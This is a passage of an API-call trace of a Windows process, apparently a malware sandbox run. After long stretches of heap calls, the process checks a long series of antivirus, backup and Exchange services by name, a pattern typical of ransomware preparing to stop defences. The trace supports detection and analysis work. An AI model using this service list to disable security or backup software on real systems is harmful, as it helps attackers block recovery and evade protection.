lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.515] GetProcessHeap () returned 0xe30000 [0059.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.516] GetProcessHeap () returned 0xe30000 [0059.516] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.519] GetProcessHeap () returned 0xe30000 [0059.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.519] GetProcessHeap () returned 0xe30000 [0059.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0059.519] GetProcessHeap () returned 0xe30000 [0059.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.520] GetProcessHeap () returned 0xe30000 [0059.520] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.521] GetProcessHeap () returned 0xe30000 [0059.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9bef8 | out: hHeap=0xe30000) returned 1 [0059.521] GetProcessHeap () returned 0xe30000 [0059.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe36f68 | out: hHeap=0xe30000) returned 1 [0059.521] GetProcessHeap () returned 0xe30000 [0059.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe505f0 | out: hHeap=0xe30000) returned 1 [0059.521] GetProcessHeap () returned 0xe30000 [0059.521] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe564b0 | out: hHeap=0xe30000) returned 1 [0059.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833900, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0xd88) returned 0x3f4 [0059.522] CloseHandle (hObject=0x3f4) returned 1 [0059.522] GetTickCount () returned 0x11505d8 [0059.522] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.523] OpenServiceW (hSCManager=0xe4d240, lpServiceName="ARSM", dwDesiredAccess=0x2c) returned 0x0 [0059.523] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.524] GetTickCount () returned 0x11505d8 [0059.524] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.524] OpenServiceW (hSCManager=0xe4d178, lpServiceName="AVP", dwDesiredAccess=0x2c) returned 0x0 [0059.524] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.525] GetTickCount () returned 0x11505d8 [0059.525] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.525] OpenServiceW (hSCManager=0xe4d178, lpServiceName="AcrSch2Svc", dwDesiredAccess=0x2c) returned 0x0 [0059.525] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.525] GetTickCount () returned 0x11505d8 [0059.525] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.526] OpenServiceW (hSCManager=0xe4d240, lpServiceName="Acronis VSS Provider", dwDesiredAccess=0x2c) returned 0x0 [0059.526] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.526] GetTickCount () returned 0x11505d8 [0059.526] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.527] OpenServiceW (hSCManager=0xe4d240, lpServiceName="AcronisAgent", dwDesiredAccess=0x2c) returned 0x0 [0059.527] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.527] GetTickCount () returned 0x11505d8 [0059.527] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.527] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="AcronixAgent", dwDesiredAccess=0x2c) returned 0x0 [0059.528] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.528] GetTickCount () returned 0x11505d8 [0059.528] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.528] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="Antivirus", dwDesiredAccess=0x2c) returned 0x0 [0059.528] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.528] GetTickCount () returned 0x11505d8 [0059.528] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.529] OpenServiceW (hSCManager=0xe4d240, lpServiceName="BackupExecAgentAccelerator", dwDesiredAccess=0x2c) returned 0x0 [0059.529] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.529] GetTickCount () returned 0x11505d8 [0059.529] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.530] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="BackupExecAgentBrowser", dwDesiredAccess=0x2c) returned 0x0 [0059.530] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.530] GetTickCount () returned 0x11505d8 [0059.530] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.530] OpenServiceW (hSCManager=0xe4d330, lpServiceName="BackupExecDeviceMediaService", dwDesiredAccess=0x2c) returned 0x0 [0059.530] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.531] GetTickCount () returned 0x11505d8 [0059.531] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.531] OpenServiceW (hSCManager=0xe4d330, lpServiceName="BackupExecJobEngine", dwDesiredAccess=0x2c) returned 0x0 [0059.531] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.531] GetTickCount () returned 0x11505d8 [0059.531] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.532] OpenServiceW (hSCManager=0xe4d060, lpServiceName="BackupExecManagementService", dwDesiredAccess=0x2c) returned 0x0 [0059.532] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.532] GetTickCount () returned 0x11505e8 [0059.532] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.533] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="BackupExecRPCService", dwDesiredAccess=0x2c) returned 0x0 [0059.533] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.533] GetTickCount () returned 0x11505e8 [0059.533] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.533] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="BackupExecVSSProvider", dwDesiredAccess=0x2c) returned 0x0 [0059.533] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.534] GetTickCount () returned 0x11505e8 [0059.534] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d268 [0059.534] OpenServiceW (hSCManager=0xe4d268, lpServiceName="DCAgent", dwDesiredAccess=0x2c) returned 0x0 [0059.534] CloseServiceHandle (hSCObject=0xe4d268) returned 1 [0059.534] GetTickCount () returned 0x11505e8 [0059.534] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.535] OpenServiceW (hSCManager=0xe4d150, lpServiceName="DbxSvc", dwDesiredAccess=0x2c) returned 0x0 [0059.535] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.535] GetTickCount () returned 0x11505e8 [0059.535] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.535] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="EPSecurityService", dwDesiredAccess=0x2c) returned 0x0 [0059.536] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.536] GetTickCount () returned 0x11505e8 [0059.536] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.536] OpenServiceW (hSCManager=0xe4d178, lpServiceName="EPUpdateService", dwDesiredAccess=0x2c) returned 0x0 [0059.537] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.537] GetTickCount () returned 0x11505e8 [0059.537] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.537] OpenServiceW (hSCManager=0xe4d240, lpServiceName="ESHASRV", dwDesiredAccess=0x2c) returned 0x0 [0059.537] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.537] GetTickCount () returned 0x11505e8 [0059.537] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.538] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="EhttpSrv", dwDesiredAccess=0x2c) returned 0x0 [0059.538] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.538] GetTickCount () returned 0x11505e8 [0059.538] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.671] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="Enterprise Client Service", dwDesiredAccess=0x2c) returned 0x0 [0059.672] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.672] GetTickCount () returned 0x1150665 [0059.672] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.673] OpenServiceW (hSCManager=0xe4d150, lpServiceName="EraserSvc11710", dwDesiredAccess=0x2c) returned 0x0 [0059.673] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.674] GetTickCount () returned 0x1150675 [0059.674] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.674] OpenServiceW (hSCManager=0xe4d060, lpServiceName="EsgShKernel", dwDesiredAccess=0x2c) returned 0x0 [0059.675] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.675] GetTickCount () returned 0x1150675 [0059.675] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.675] OpenServiceW (hSCManager=0xe4d060, lpServiceName="FA_Scheduler", dwDesiredAccess=0x2c) returned 0x0 [0059.676] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.676] GetTickCount () returned 0x1150675 [0059.676] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.676] OpenServiceW (hSCManager=0xe4d240, lpServiceName="IISAdmin", dwDesiredAccess=0x2c) returned 0x0 [0059.677] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.677] GetTickCount () returned 0x1150675 [0059.677] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d178 [0059.677] OpenServiceW (hSCManager=0xe4d178, lpServiceName="IMAP4Svc", dwDesiredAccess=0x2c) returned 0x0 [0059.678] CloseServiceHandle (hSCObject=0xe4d178) returned 1 [0059.678] GetTickCount () returned 0x1150675 [0059.678] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.678] OpenServiceW (hSCManager=0xe4d150, lpServiceName="KAVFS", dwDesiredAccess=0x2c) returned 0x0 [0059.678] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.679] GetTickCount () returned 0x1150675 [0059.679] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.679] OpenServiceW (hSCManager=0xe4d150, lpServiceName="KAVFSGT", dwDesiredAccess=0x2c) returned 0x0 [0059.679] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.679] GetTickCount () returned 0x1150675 [0059.679] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.680] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MBAMService", dwDesiredAccess=0x2c) returned 0x0 [0059.680] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.680] GetTickCount () returned 0x1150675 [0059.680] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.681] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MBEndpointAgent", dwDesiredAccess=0x2c) returned 0x0 [0059.681] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.681] GetTickCount () returned 0x1150675 [0059.681] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d268 [0059.681] OpenServiceW (hSCManager=0xe4d268, lpServiceName="MMS", dwDesiredAccess=0x2c) returned 0x0 [0059.682] CloseServiceHandle (hSCObject=0xe4d268) returned 1 [0059.682] GetTickCount () returned 0x1150675 [0059.682] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.682] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSExchangeAB", dwDesiredAccess=0x2c) returned 0x0 [0059.682] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.682] GetTickCount () returned 0x1150675 [0059.682] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.683] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSExchangeADTopology", dwDesiredAccess=0x2c) returned 0x0 [0059.683] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.683] GetTickCount () returned 0x1150675 [0059.683] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.684] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSExchangeAntispamUpdate", dwDesiredAccess=0x2c) returned 0x0 [0059.684] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.684] GetTickCount () returned 0x1150675 [0059.684] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.684] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSExchangeES", dwDesiredAccess=0x2c) returned 0x0 [0059.684] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.685] GetTickCount () returned 0x1150675 [0059.685] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.685] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSExchangeEdgeSync", dwDesiredAccess=0x2c) returned 0x0 [0059.685] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.685] GetTickCount () returned 0x1150675 [0059.685] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.686] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSExchangeFBA", dwDesiredAccess=0x2c) returned 0x0 [0059.686] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.686] GetTickCount () returned 0x1150675 [0059.686] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.686] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSExchangeFDS", dwDesiredAccess=0x2c) returned 0x0 [0059.687] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.687] GetTickCount () returned 0x1150675 [0059.687] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.687] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSExchangeIS", dwDesiredAccess=0x2c) returned 0x0 [0059.687] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.688] GetTickCount () returned 0x1150675 [0059.688] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.688] OpenServiceW (hSCManager=0xe4d330, lpServiceName="MSExchangeMGMT", dwDesiredAccess=0x2c) returned 0x0 [0059.688] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.688] GetTickCount () returned 0x1150684 [0059.688] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.689] OpenServiceW (hSCManager=0xe4d330, lpServiceName="MSExchangeMTA", dwDesiredAccess=0x2c) returned 0x0 [0059.689] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.689] GetTickCount () returned 0x1150684 [0059.689] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.689] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSExchangeMailSubmission", dwDesiredAccess=0x2c) returned 0x0 [0059.690] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.690] GetTickCount () returned 0x1150684 [0059.690] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.690] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSExchangeMailboxAssistants", dwDesiredAccess=0x2c) returned 0x0 [0059.690] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.691] GetTickCount () returned 0x1150684 [0059.691] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d330 [0059.691] OpenServiceW (hSCManager=0xe4d330, lpServiceName="MSExchangeMailboxReplication", dwDesiredAccess=0x2c) returned 0x0 [0059.691] CloseServiceHandle (hSCObject=0xe4d330) returned 1 [0059.691] GetTickCount () returned 0x1150684 [0059.691] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d060 [0059.692] OpenServiceW (hSCManager=0xe4d060, lpServiceName="MSExchangeProtectedServiceHost", dwDesiredAccess=0x2c) returned 0x0 [0059.692] CloseServiceHandle (hSCObject=0xe4d060) returned 1 [0059.692] GetTickCount () returned 0x1150684 [0059.692] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d240 [0059.692] OpenServiceW (hSCManager=0xe4d240, lpServiceName="MSExchangeRPC", dwDesiredAccess=0x2c) returned 0x0 [0059.693] CloseServiceHandle (hSCObject=0xe4d240) returned 1 [0059.693] GetTickCount () returned 0x1150684 [0059.693] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.693] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSExchangeRepl", dwDesiredAccess=0x2c) returned 0x0 [0059.693] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.694] GetTickCount () returned 0x1150684 [0059.694] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4cf70 [0059.694] OpenServiceW (hSCManager=0xe4cf70, lpServiceName="MSExchangeSA", dwDesiredAccess=0x2c) returned 0x0 [0059.694] CloseServiceHandle (hSCObject=0xe4cf70) returned 1 [0059.694] GetTickCount () returned 0x1150684 [0059.694] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d2e0 [0059.695] OpenServiceW (hSCManager=0xe4d2e0, lpServiceName="MSExchangeSRS", dwDesiredAccess=0x2c) returned 0x0 [0059.695] CloseServiceHandle (hSCObject=0xe4d2e0) returned 1 [0059.695] GetTickCount () returned 0x1150684 [0059.695] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d3a8 [0059.695] OpenServiceW (hSCManager=0xe4d3a8, lpServiceName="MSExchangeSearch", dwDesiredAccess=0x2c) returned 0x0 [0059.696] CloseServiceHandle (hSCObject=0xe4d3a8) returned 1 [0059.696] GetTickCount () returned 0x1150684 [0059.696] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0xe4d150 [0059.696] OpenServiceW (hSCManager=0xe4d150, lpServiceName="MSExchangeServiceHost", dwDesiredAccess=0x2c) returned 0x0 [0059.702] CloseServiceHandle (hSCObject=0xe4d150) returned 1 [0059.703] GetTickCount () returned 